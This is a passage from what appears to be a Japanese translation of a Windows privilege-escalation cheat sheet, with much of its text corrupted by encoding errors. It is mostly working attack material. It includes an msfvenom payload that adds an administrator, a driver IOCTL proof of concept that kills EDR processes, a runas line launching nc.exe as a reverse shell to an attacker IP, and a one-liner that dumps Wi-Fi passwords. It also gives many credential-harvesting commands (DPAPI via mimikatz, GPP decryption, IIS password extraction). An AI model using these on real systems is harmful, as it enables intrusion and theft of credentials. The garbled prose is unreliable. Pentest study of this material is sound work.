for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
æ€åºããŠæªçšã§ããŸã ãã®è匱æ§ã¯metasploitã§: exploit/windows/local/trusted\_service\_path metasploitã§ãµãŒãã¹ãã€ããªãæåã§äœæã§ããŸã:
msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
ãªã«ããªãŒã¢ã¯ã·ã§ã³
Windowsã§ã¯ããµãŒãã¹ã倱æããå Žåã«å®è¡ãããã¢ã¯ã·ã§ã³ããŠãŒã¶ãŒãæå®ã§ããŸãããã®æ©èœã¯ãã€ããªãæãããã«èšå®ã§ããŸãããã®ãã€ããªã眮ãæãå¯èœã§ããã°ãæš©éææ Œãå¯èœã«ãªãå ŽåããããŸãã詳现ã¯å ¬åŒããã¥ã¡ã³ããåç §ããŠãã ããã
ã¢ããªã±ãŒã·ã§ã³
ã€ã³ã¹ããŒã«æžã¿ã¢ããªã±ãŒã·ã§ã³
ãã€ããªã®æš©éïŒäžæžãã§ããã°æš©éææ Œã§ãããããããŸããïŒããã³ãã©ã«ãã®æš©éã確èªããŠãã ããïŒDLL HijackingïŒã
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
æžã蟌ã¿æš©é
èšå®ãã¡ã€ã«ãå€æŽããŠç¹å®ã®ãã¡ã€ã«ãèªã¿åãããããŸã㯠Administrator ã¢ã«ãŠã³ãã«ãã£ãŠå®è¡ããããã€ããªïŒschedtasksïŒãå€æŽã§ããã確èªããŠãã ããã
ã·ã¹ãã å ã®åŒ±ããã©ã«ãïŒãã¡ã€ã«ã®æš©éãèŠã€ããæ¹æ³ã®äžã€ã¯æ¬¡ã®ãšããã§ã:
accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
èµ·åæã«å®è¡
å¥ã®ãŠãŒã¶ãŒã«ãã£ãŠå®è¡ãããã¬ãžã¹ããªããã€ããªãäžæžãã§ããã確èªããã
èªã 次ã®ããŒãž ãåç
§ããæš©éææ Œã®ããã®èå³æ·±ã autoruns ã®å Žæ ã«ã€ããŠè©³ããåŠãã§ãã ãã:
Privilege Escalation with Autoruns
ãã©ã€ã
å¯èœæ§ã®ãã ãµãŒãããŒãã£ã®å¥åŠ/è匱㪠ãã©ã€ããæ¢ã
driverquery
driverquery.exe /fo table
driverquery /SI
ãã©ã€ããä»»æã®ã«ãŒãã«èªã¿æžãããªããã£ããå ¬éããŠããå ŽåïŒäžé©åã«èšèšããã IOCTL ãã³ãã©ã§äžè¬çïŒãã«ãŒãã«ã¡ã¢ãªããçŽæ¥ SYSTEM token ã奪åããŠæš©éææ Œã§ããŸããã¹ããããã€ã¹ãããã®ææ³ã¯ä»¥äžãåç §ããŠãã ãã:
Arbitrary Kernel Rw Token Theft
è匱ãªåŒã³åºããæ»æè ãå¶åŸ¡ãã Object Manager ãã¹ãéããããªã¬ãŒã¹ã³ã³ãã£ã·ã§ã³ãã°ã§ã¯ãlookup ãæå³çã«é 延ãããïŒæ倧é·ã³ã³ããŒãã³ããæ·±ããã£ã¬ã¯ããªãã§ãŒã³ã䜿çšïŒããšã§ããŠã£ã³ããŠããã€ã¯ãç§ããæ°åãã€ã¯ãç§ã«ãŸã§æ¡åŒµã§ããŸã:
Kernel Race Condition Object Manager Slowdown
Registry hive memory corruption primitives
Modern hive vulnerabilities let you groom deterministic layouts, abuse writable HKLM/HKU descendants, and convert metadata corruption into kernel paged-pool overflows without a custom driver. Learn the full chain here:
Windows Registry Hive Exploitation
Abusing missing FILE_DEVICE_SECURE_OPEN on device objects (LPE + EDR kill)
äžéšã®çœ²åããããµãŒãããŒãã£è£œãã©ã€ãã¯ãIoCreateDeviceSecure ã䜿ã£ãŠåŒ·ã SDDL 㧠device object ãäœæããŸãããDeviceCharacteristics ã« FILE_DEVICE_SECURE_OPEN ãèšå®ãå¿ããããšããããŸãããã®ãã©ã°ããªããšãè¿œå ã®ã³ã³ããŒãã³ããå«ããã¹ã§ããã€ã¹ãéãããå Žåã« secure DACL ãé©çšããããä»»æã®æš©éã®ãªããŠãŒã¶ã次ã®ãããªåå空éãã¹ã䜿ã£ãŠãã³ãã«ãååŸã§ããŠããŸããŸã:
- \ .\DeviceName\anything
- \ .\amsdk\anyfile (from a real-world case)
äžæŠãŠãŒã¶ãããã€ã¹ãéããããã«ãªããšããã©ã€ããå ¬éããç¹æš©ä»ãã® IOCTL 㯠LPE ãæ¹ããã«æªçšå¯èœã§ããå®éã«èŠ³æž¬ãããäŸ:
- ä»»æã®ããã»ã¹ã«å¯ŸããŠãã«ã¢ã¯ã»ã¹ã®ãã³ãã«ãè¿ãïŒtoken theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUserïŒã
- å¶éãªãã® raw disk èªã¿æžãïŒoffline tamperingãboot-time persistence tricksïŒã
- Protected Process/Light (PP/PPL) ãå«ãä»»æã®ããã»ã¹ãçµäºãããã«ãŒãã«çµç±ã§ãŠãŒã¶ã©ã³ããã AV/EDR ã kill ã§ããããã«ããã
Minimal PoC pattern (user mode):
// Example based on a vulnerable antimalware driver
#define IOCTL_REGISTER_PROCESS 0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048
HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS, &me, sizeof(me), 0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);
éçºè åãã®ç·©åç
- DACLã§å¶éããæå³ã®ããããã€ã¹ãªããžã§ã¯ããäœæããéã¯ãFILE_DEVICE_SECURE_OPENãåžžã«èšå®ããã
- ç¹æš©æäœã®åŒã³åºãå ã³ã³ããã¹ããæ€èšŒãããããã»ã¹çµäºããã³ãã«è¿åŽãèš±å¯ããåã«PP/PPLãã§ãã¯ãè¿œå ããã
- IOCTLsïŒaccess masksãMETHOD_*, å ¥åæ€èšŒïŒãå¶éããçŽæ¥ã«ãŒãã«æš©éãäžãã代ããã«ãããŒã«ãŒåã¢ãã«ãæ€èšããã
é²åŸ¡è åãã®æ€åºã¢ã€ãã¢
- ãŠãŒã¶ãŒã¢ãŒãã«ããçãããããã€ã¹åïŒäŸ: \ .\amsdk*ïŒãžã®openæäœãšãæªçšã瀺ãç¹å®ã®IOCTLã·ãŒã±ã³ã¹ãç£èŠããã
- Microsoftã®vulnerable driver blocklistïŒHVCI/WDAC/Smart App ControlïŒãé©çšããç¬èªã®allow/denyãªã¹ããç¶æããã
PATH DLL Hijacking
If you have write permissions inside a folder present on PATH you could be able to hijack a DLL loaded by a process and escalate privileges.
Check permissions of all folders inside PATH:
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
ãã®ãã§ãã¯ãæªçšããæ¹æ³ã®è©³çŽ°ã«ã€ããŠã¯æ¬¡ãåç §ããŠãã ãã:
Writable Sys Path +Dll Hijacking Privesc
ãããã¯ãŒã¯
å ±æ
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
hosts file
hosts file ã«ããŒãã³ãŒããããä»ã®æ¢ç¥ã®ã³ã³ãã¥ãŒã¿ã確èªãã
type C:\Windows\System32\drivers\etc\hosts
ãããã¯ãŒã¯ã€ã³ã¿ãŒãã§ãŒã¹ãšDNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Open Ports
å€éšããå¶éããããµãŒãã¹ã確èªãã
netstat -ano #Opened ports?
ã«ãŒãã£ã³ã°ããŒãã«
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP ããŒãã«
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
ãã¡ã€ã¢ãŠã©ãŒã«ã®ã«ãŒã«
Check this page for Firewall related commands ïŒã«ãŒã«äžèŠ§ãã«ãŒã«äœæãç¡å¹åãç¡å¹åâŠïŒ
ããã« commands for network enumeration here
Windows Subsystem for Linux (wsl)
C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe
ãã€ã㪠bash.exe 㯠C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe ã«ããããŸãã
root user ãååŸãããšä»»æã®ããŒãã§ãªãã¹ã³ã§ããŸãïŒnc.exe ãããŒãã§ãªãã¹ã³ããã®ã¯æåã«è¡ããšãã ãã§ãGUI ã«ãã nc ããã¡ã€ã¢ãŠã©ãŒã«ã§èš±å¯ãããã©ããã確èªãããŸãïŒã
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
ç°¡åã«rootã§bashãèµ·åããã«ã¯ã--default-user root ãè©ŠããŠãã ãã
ãã©ã«ã C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\ å
㧠WSL ã®ãã¡ã€ã«ã·ã¹ãã ãåç
§ã§ããŸãã
Windows è³æ Œæ å ±
Winlogon è³æ Œæ å ±
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword
è³æ Œæ å ±ãããŒãžã£ / Windows vault
From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault\
The Windows Vault stores user credentials for servers, websites and other programs that Windows can ãŠãŒã¶ãŒãèªåçã«ãã°ã€ã³ããããAt first instance, this might look like now users can store their Facebook credentials, Twitter credentials, Gmail credentials etc., so that they automatically log in via browsers. But it is not so.
Windows Vault stores credentials that Windows can log in the users automatically, which means that any ãªãœãŒã¹ã«ã¢ã¯ã»ã¹ããããã«è³æ Œæ å ±ãå¿ èŠãšããWindowsã¢ããªã±ãŒã·ã§ã³ (server or a website) ãã®Credential Managerãå©çšã§ãã & Windows Vault and use the credentials supplied instead of users entering the username and password all the time.
Unless the applications interact with Credential Manager, I donât think it is possible for them to use the credentials for a given resource. So, if your application wants to make use of the vault, it should somehow credential managerãšéä¿¡ããŠãã®ãªãœãŒã¹ã®è³æ Œæ å ±ãèŠæ±ãã from the default storage vault.
Use the cmdkey to list the stored credentials on the machine.
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
次ã«ãä¿åãããè³æ Œæ
å ±ã䜿çšããããã«ã/savecred ãªãã·ã§ã³ä»ã㧠runas ã䜿çšã§ããŸãã以äžã®äŸã¯ SMB share çµç±ã§ãªã¢ãŒã binary ãåŒã³åºããŠããŸãã
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
æäŸãããè³æ Œæ
å ±ã䜿çšã㊠runas ãå®è¡ããã
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Note that mimikatzãlazagneãcredentialfileviewãVaultPasswordViewããŸãã¯Empire Powershells module ã䜿çšããããšã«æ³šæããŠãã ããã
DPAPI
Data Protection API (DPAPI) ã¯ããŒã¿ã®å¯Ÿç§°æå·åã®æ段ãæäŸãã䞻㫠Windows ãªãã¬ãŒãã£ã³ã°ã·ã¹ãã å ã§é察称ã®ç§å¯éµã察称çã«æå·åããããã«äœ¿çšãããŸãããã®æå·åã¯ããŠãŒã¶ãŒãŸãã¯ã·ã¹ãã ã®ã·ãŒã¯ã¬ãããå©çšããŠãšã³ããããŒã«å€§ããå¯äžããŸãã
DPAPI ã¯ããŠãŒã¶ãŒã®ãã°ã€ã³ã·ãŒã¯ã¬ããããå°åºããã察称éµãä»ããŠéµãæå·åã§ããããã«ããŸããã·ã¹ãã æå·åã®å Žåã¯ãã·ã¹ãã ã®ãã¡ã€ã³èªèšŒã·ãŒã¯ã¬ãããå©çšããŸãã
DPAPI ã䜿çšããŠæå·åããããŠãŒã¶ãŒã® RSA éµã¯ã%APPDATA%\Microsoft\Protect\{SID} ãã£ã¬ã¯ããªã«ä¿åãããŸãããã㧠{SID} ã¯ãŠãŒã¶ãŒã® Security Identifier ãè¡šããŸããDPAPI ããŒã¯ããŠãŒã¶ãŒã®ç§å¯éµãä¿è·ãããã¹ã¿ãŒããŒãšåããã¡ã€ã«ã«å
±çœ®ãããŠããã é垞㯠64 ãã€ãã®ã©ã³ãã ããŒã¿ã§æ§æãããŸããïŒãã®ãã£ã¬ã¯ããªãžã®ã¢ã¯ã»ã¹ã¯å¶éãããŠãããCMD ã® dir ã³ãã³ãã§ã¯å
容ãäžèŠ§è¡šç€ºã§ããŸããããPowerShell ã§ã¯äžèŠ§è¡šç€ºå¯èœã§ããïŒ
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\
é©åãªåŒæ°ïŒ/pvk ãŸã㯠/rpcïŒãæå®ããŠãmimikatz module dpapi::masterkey ã䜿çšãããšåŸ©å·ã§ããŸãã
credentials files protected by the master password ã¯é垞次ã®å Žæã«ãããŸã:
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
é©å㪠/masterkey ãæå®ããŠãmimikatz module dpapi::cred ã䜿ã£ãŠåŸ©å·ã§ããŸãã\
PowerShell è³æ Œæ å ±
PowerShell credentials ã¯æå·åãããè³æ Œæ å ±ã䟿å©ã«ä¿åããæ段ãšããŠãscripting ãèªååã¿ã¹ã¯ã§ãã䜿ãããŸããè³æ Œæ å ±ã¯ DPAPI ã«ããä¿è·ãããŠãããéåžžã¯äœæãããã®ãšåããŠãŒã¶ãŒãåãã³ã³ãã¥ãŒã¿ãŒäžã§ãã埩å·ã§ããŸããã
å€ãã® DPAPI masterkeys ã ã¡ã¢ãª ãã sekurlsa::dpapi ã¢ãžã¥ãŒã«ã§æœåºã§ããŸãïŒroot ã®å ŽåïŒã
ãã¡ã€ã«ã«å«ãŸãã PS credentials ã åŸ©å· ããã«ã¯ã次ã®ããã«ããŸãïŒ
PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username
john
PS C:\htb> $credential.GetNetworkCredential().password
JustAPWD!
Wifi
#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*
ä¿åããã RDP æ¥ç¶
ããã㯠HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
ããã³ HKCU\Software\Microsoft\Terminal Server Client\Servers\
æè¿å®è¡ããã³ãã³ã
HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
ãªã¢ãŒããã¹ã¯ãããè³æ Œæ å ±ãããŒãžã£ãŒ
%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Use the Mimikatz dpapi::rdg module with appropriate /masterkey to **decrypt any .rdg files\ é©å㪠/masterkeyãæå®ã㊠**Mimikatz** ã®dpapi::rdg` ã¢ãžã¥ãŒã«ã䜿çšããä»»æã® .rdg ãã¡ã€ã«ã åŸ©å· ããŸã\
You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi module
Mimikatz sekurlsa::dpapi ã¢ãžã¥ãŒã«ã§ã¡ã¢ãªããå€ãã® DPAPI masterkeys ãæœåºã§ããŸã
Sticky Notes
People often use the StickyNotes app on Windows workstations to save passwords and other information, not realizing it is a database file. This file is located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite and is always worth searching for and examining.
Windows ã®ã¯ãŒã¯ã¹ããŒã·ã§ã³ã§ StickyNotes ã¢ããªã䜿çšããŠãããŒã¿ããŒã¹ãã¡ã€ã«ã§ããããšã«æ°ã¥ããã«ãã¹ã¯ãŒããä¿åããããã®ä»ã®æ
å ±ãèšé²ãããããŠããããšããããããŸãã
ãã®ãã¡ã€ã«ã¯ C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite ã«ãããåžžã«æ€çŽ¢ããŠèª¿æ»ãã䟡å€ããããŸãã
AppCmd.exe
Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.
AppCmd.exe ã¯ç®¡çè
æš©é㧠High Integrity ã¬ãã«ã§å®è¡ããå¿
èŠãããç¹ã«æ³šæããŠãã ããã
AppCmd.exe is located in the %systemroot%\system32\inetsrv\ directory.
AppCmd.exe 㯠%systemroot%\system32\inetsrv\ ãã£ã¬ã¯ããªã«ãããŸãã
If this file exists then it is possible that some credentials have been configured and can be recovered.
ãã®ãã¡ã€ã«ãååšããå Žåãããã€ãã® credentials ãèšå®ãããŠãã recovered ã§ããå¯èœæ§ããããŸãã
This code was extracted from PowerUP:
ãã®ã³ãŒã㯠PowerUP ããæœåºãããŸããïŒ
function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
# Check if appcmd.exe exists
if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable
# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")
# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
# Get application pool name
$PoolName = $_
# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd
# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd
# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}
# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
# Get Virtual Directory Name
$VdirName = $_
# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd
# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd
# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}
# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}
SCClient / SCCM
C:\Windows\CCM\SCClient.exe ãååšããã確èªããã
ã€ã³ã¹ããŒã©ãŒã¯ run with SYSTEM privileges, å€ã㯠DLL Sideloading (Info from https://github.com/enjoiz/Privesc). ã«è匱ã§ãã
$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }
ãã¡ã€ã«ãšã¬ãžã¹ããªïŒCredentialsïŒ
Putty Creds
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
Putty SSH Host Keys
reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\
SSH keys in registry
SSH private keys ã¯ã¬ãžã¹ããªã㌠HKCU\Software\OpenSSH\Agent\Keys ã«æ ŒçŽãããŠããããšããããããããã«èå³æ·±ããã®ããªãã確èªããŠãã ãã:
reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
ãããã®ãã¹å
ã§ãšã³ããªãèŠã€ããå Žåãããããä¿åããã SSH key ã§ããæå·åãããç¶æ
ã§ä¿åãããŠããŸãããhttps://github.com/ropnop/windows_sshagent_extract ã䜿çšããã°ç°¡åã«åŸ©å·ã§ããŸãã
ãã®ææ³ã®è©³çŽ°ã¯ãã¡ã: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
ãã ssh-agent service ãåäœããŠããããèµ·åæã«èªåçã«éå§ããããå Žåã¯æ¬¡ãå®è¡ããŠãã ãã:
Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service
Tip
ãã®ææ³ã¯ãã¯ãæå¹ã§ãªãããã§ããssh ããŒãäœæããŠ
ssh-addã§è¿œå ããssh ã§ãã·ã³ã«ãã°ã€ã³ããŠã¿ãŸãããã¬ãžã¹ã㪠HKCU\Software\OpenSSH\Agent\Keys ã¯ååšãããprocmon ã¯é察称ããŒèªèšŒäžã«dpapi.dllã®äœ¿çšãæ€åºããŸããã§ããã
ç¡äººãã¡ã€ã«
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
ãããã®ãã¡ã€ã«ã¯ metasploit ã䜿ã£ãŠæ€çŽ¢ããããšãã§ããŸã: post/windows/gather/enum_unattend
äŸã®å 容:
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>
<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>
SAM & SYSTEM ã®ããã¯ã¢ãã
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
ã¯ã©ãŠãèªèšŒæ å ±
#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json
McAfee SiteList.xml
ãã¡ã€ã« SiteList.xml ãæ€çŽ¢ãã
Cached GPP ãã¹ã¯ãŒã
以åãGroup Policy Preferences (GPP) ã䜿çšããŠè€æ°ã®ãã·ã³ã«ã«ã¹ã¿ã ã®ããŒã«ã«ç®¡çè ã¢ã«ãŠã³ããé åžã§ããæ©èœããããŸããããããããã®æ¹æ³ã«ã¯é倧ãªã»ãã¥ãªãã£äžã®æ¬ é¥ããããŸããã第äžã«ãSYSVOL ã« XML ãã¡ã€ã«ãšããŠä¿åããã Group Policy Objects (GPOs) ã¯ãä»»æã®ãã¡ã€ã³ãŠãŒã¶ãŒãã¢ã¯ã»ã¹ã§ããŸããã第äºã«ããããã® GPP å ã®ãã¹ã¯ãŒãã¯å ¬éãããŠããããã©ã«ãããŒãçšã㊠AES256 ã§æå·åãããŠããŸããããèªèšŒæžã¿ãŠãŒã¶ãŒã§ããã°åŸ©å·ã§ããŸãããããã«ããæš©éææ Œãå¯èœã«ãªããªã©æ·±å»ãªãªã¹ã¯ãçããŸããã
ãã®ãªã¹ã¯ã軜æžãããããâcpasswordâ ãã£ãŒã«ãã空ã§ãªãããŒã«ã«ã«ãã£ãã·ã¥ããã GPP ãã¡ã€ã«ãã¹ãã£ã³ããé¢æ°ãäœæãããŸããã該åœãããã¡ã€ã«ãèŠã€ãããšããã®é¢æ°ã¯ãã¹ã¯ãŒãã埩å·ããã«ã¹ã¿ã ã® PowerShell ãªããžã§ã¯ããè¿ããŸãããã®ãªããžã§ã¯ãã«ã¯ GPP ã®è©³çŽ°ãšãã¡ã€ã«ã®å Žæãå«ãŸããŠãããè匱æ§ã®ç¹å®ãšä¿®åŸ©ã«åœ¹ç«ã¡ãŸãã
次ã®å Žæã§ä»¥äžã®ãã¡ã€ã«ãæ€çŽ¢ãã: C:\ProgramData\Microsoft\Group Policy\history ãŸã㯠C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\historyïŒW Vista ããåïŒ:
- Groups.xml
- Services.xml
- Scheduledtasks.xml
- DataSources.xml
- Printers.xml
- Drives.xml
cPassword ã埩å·ããã«ã¯ïŒ
#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
crackmapexecã䜿ã£ãŠãã¹ã¯ãŒããååŸãã:
crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
IIS ã® Web èšå®
Get-Childitem âPath C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Get-Childitem âPath C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem âPath C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
credentials ãå«ã web.config ã®äŸ:
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
